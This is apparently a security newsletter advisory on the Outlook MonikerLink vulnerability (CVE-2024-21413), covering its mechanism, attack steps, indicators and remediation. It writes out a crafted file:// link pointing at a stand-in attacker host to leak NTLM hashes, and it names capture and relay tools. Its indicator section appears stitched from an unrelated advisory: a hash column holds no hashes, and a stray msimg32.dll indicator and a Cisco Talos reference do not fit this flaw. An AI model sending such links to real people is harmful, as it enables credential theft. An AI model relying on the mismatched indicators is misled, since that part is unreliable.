CVE-2024-21413: Outlook MonikerLink NTLM Credential Theft
A single malicious hyperlink in an Outlook email — no click required, no attachment to open — silently leaks Windows NTLM credentials to any attacker who can send you an email
CVE-2024-21413, named 'MonikerLink' by Checkpoint Research, is a critical Microsoft Outlook vulnerability patched in February 2024 that allows an attacker to silently steal a victim's Windows NTLMv2 credentials by sending them a specially crafted email — no attachment to open, no macro to enable, and no hyperlink to click. Simply previewing the email in Outlook's Reading Pane is sufficient. The attack exploits a bypass in Outlook's Protected View mechanism using an exclamation mark appended to a file:// moniker URL, causing Windows to initiate an outbound NTLM authentication handshake to an attacker-controlled server and transmit the victim's Net-NTLMv2 hash.
The MonikerLink Mechanism: Exclamation Mark Bypass
Windows Monikers are COM object naming constructs that associate URL protocol schemes with object handlers. The file:// moniker causes Windows to initiate access to a UNC network path (\\server\share) via SMB, which triggers Windows NTLM authentication as part of the SMB protocol handshake.
Outlook normally identifies file:// URLs pointing to UNC paths as potentially dangerous and applies Protected View isolation — blocking automatic processing. CVE-2024-21413 bypasses this entirely. Checkpoint Research discovered that appending an exclamation mark and arbitrary text to the file:// URL — for example, `file:///\\attacker.com\share\file!arbitrary_text` — caused Outlook's URL classifier to misidentify the link type, bypassing the Protected View check.
When Outlook processes this link during email preview (an automatic action), it triggers the Windows file:// moniker handler. Windows initiates an SMB connection to the specified server. SMB authentication transmits the victim's Net-NTLMv2 hash as part of the standard Windows authentication challenge-response. The attacker's server captures this hash without the user clicking anything.
From Hash Capture to Credential Compromise
The captured Net-NTLMv2 hash is not the plaintext password, but it opens two distinct attack paths:
**Offline cracking**: Net-NTLMv2 hashes can be cracked with hashcat or John the Ripper. Common or moderate-complexity passwords crack in minutes to hours on modern GPU hardware. Any password under 8 characters or following common patterns is at high risk.
**NTLM Relay attacks**: The attacker can relay the captured authentication in real time to another service — for example, capturing the victim's authentication and immediately replaying it to the organization's Exchange server, SharePoint, or file shares to authenticate as the victim. Tools like Responder (for capture) and ntlmrelayx (for relay) are publicly available and widely used. Extended Protection for Authentication (EPA) on target services is the primary defense against relay.
For high-privilege targets (IT administrators, C-suite, service accounts), a captured and cracked or relayed hash can translate directly to domain-level access.
Historical Context: The Outlook NTLM Leak Pattern
CVE-2024-21413 is the latest in a series of Outlook vulnerabilities enabling NTLM credential theft via automatic content processing:
- **CVE-2023-23397** (March 2023, patched as an APT28 zero-day): Malicious calendar reminder with a UNC path in the reminder sound file field caused automatic NTLM authentication on reminder popup — no email open or click required. - **CVE-2024-21413** (February 2024): Malicious file:// hyperlink with exclamation mark bypass in email body triggers NTLM authentication on email preview.
Both vulnerabilities exploit the fundamental behavior of Windows NTLM authentication — any application that triggers access to a UNC network path on behalf of a Windows user will cause that user's NTLM credentials to be transmitted to the path's server. Outlook's rich content processing repeatedly creates surfaces where attacker-controlled content can trigger this behavior.
Malicious Email Crafted
Attacker creates email body containing a hyperlink with crafted file:// moniker: file:///\\attacker-server\share\file!anytext. The exclamation mark suffix bypasses Outlook's URL safety classifier.
Email Delivered to Target
Email arrives in victim's inbox. No attachment, no macro, no suspicious indicator beyond a hyperlink that appears as a normal-looking file reference.
Outlook Previews Email — Moniker Processed
Victim selects the email in Outlook's Reading Pane (or opens it). Outlook processes the email body content including the file:// moniker. The exclamation mark bypass prevents Protected View from sandboxing the link.
Windows Initiates NTLM Authentication
Windows file:// moniker handler initiates an SMB connection to attacker's server. Windows NTLM challenge-response transmits the victim's Net-NTLMv2 hash — automatically, silently, before the user takes any further action.
Hash Cracked or Relayed
Attacker receives Net-NTLMv2 hash. Either cracks it offline to obtain plaintext password, or relays the authentication in real time to Exchange/SharePoint/file shares to access resources as the victim.
Indicators of Compromise
Detection for CVE-2024-21413 exploitation:
| Artifact | Type | SHA-256 (Truncated) |
|---|---|---|
| Email body hyperlinks containing file:// with UNC paths and exclamation mark suffix pattern | Email security gateway / content inspection | Pattern: file:///\\[external-hostname]\[share]\[file]![arbitrary] — any file:// link to an external host with exclamation mark suffix should be blocked at the email gateway |
| Outbound SMB (TCP 445) connections from workstations to external (non-RFC-1918) IP addresses | Firewall / network telemetry | External outbound SMB is almost universally anomalous; if outbound port 445 is not blocked at the perimeter, any such connection warrants investigation |
| Windows Security Event 4624 (Successful Logon) or 4625 (Failed Logon) with NTLM authentication type to unexpected destinations | Windows Security Event Log | NTLMv2 authentication attempts to non-corporate servers in Security log; correlate with Outlook process network activity |
| Outlook.exe initiating SMB connections without user-initiated file access action | EDR process-network correlation | Outlook making outbound port 445 connections during email preview without any user click on a file attachment is a direct exploitation indicator |
Any instance of msimg32.dll found outside C:\Windows\System32 is an active IOC. Isolate the host immediately. Full hashes and IOC lists are available via the Cisco Talos GitHub repository.
Remediation
Steps in order of priority:
Apply February 2024 Patch Tuesday updates for Outlook and Office
The fix corrects the URL parsing logic that allowed the exclamation mark Protected View bypass. Verify via Office update history that the February 2024 CU is applied. The patch is delivered through standard Microsoft Update channels.
Block outbound SMB (TCP 445) at the perimeter firewall
Workstations should never initiate outbound SMB connections to the internet. Blocking TCP 445 outbound at the firewall prevents NTLM hash capture for CVE-2024-21413, CVE-2023-23397, and all similar vulnerabilities — and is a security baseline recommendation independent of any specific CVE. If outbound port 445 is currently permitted, this is an immediate misconfiguration to remediate.
Enable Extended Protection for Authentication (EPA) on internal services
EPA (also called Channel Binding) on Exchange, SharePoint, IIS, and file servers prevents NTLM relay attacks even when a hash is captured. Without EPA, a captured hash can be relayed to authenticate to internal services. Microsoft has enabled EPA by default on Exchange Server in recent updates — verify it is active.
Restrict NTLM authentication in Active Directory
Group Policy settings under Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → Network Security: Restrict NTLM can limit where NTLM authentication is permitted. Consider blocking NTLM to internet destinations and evaluating NTLMv1 restriction or full NTLM deprecation in favor of Kerberos.
Deploy email gateway rules to detect MonikerLink patterns
Configure email security gateways to quarantine or strip emails containing file:// hyperlinks pointing to external hosts with exclamation mark suffixes. This pattern has no legitimate use in business email and should be blocked as a policy rule independent of this specific CVE.
The bottom line
CVE-2024-21413 represents an attack category that confounds traditional security awareness training — there is no malicious attachment to avoid, no macro warning to dismiss, and no suspicious link to refuse to click. The credential theft happens automatically during normal email reading. Blocking outbound SMB at the perimeter is the single most impactful control and should already be in place as a security baseline. For organizations that do not currently block outbound port 445, discovering this via a MonikerLink attack is a far worse outcome than implementing the control proactively.
Frequently asked questions
Is CVE-2024-21413 related to CVE-2023-23397 (the Outlook calendar zero-day)?
They share the same class of attack — Outlook processing attacker-controlled content that triggers Windows NTLM authentication to an external server — but are distinct vulnerabilities using different attack surfaces. CVE-2023-23397 used malicious calendar reminder sound file paths. CVE-2024-21413 uses malicious hyperlinks in email bodies with a different Protected View bypass mechanism.
Can the Net-NTLMv2 hash captured by an attacker be used directly to log in?
Net-NTLMv2 hashes cannot be directly used for pass-the-hash authentication (unlike NTLM hashes). However, they can be cracked offline to reveal the plaintext password, or relayed in real time to authenticate as the victim to other services via NTLM relay attacks — a well-established attack technique using tools like Responder and ntlmrelayx.
Does this affect Outlook on the web (OWA) or Outlook for Mac?
No. CVE-2024-21413 affects the Windows Outlook desktop client only. Outlook on the web (OWA) runs in a browser sandbox that does not have access to Windows NTLM authentication. Outlook for Mac uses a different code base without Windows moniker processing and is not affected.
Sources & references
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, weekly, no spam.
Unsubscribe anytime. We never sell your data.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.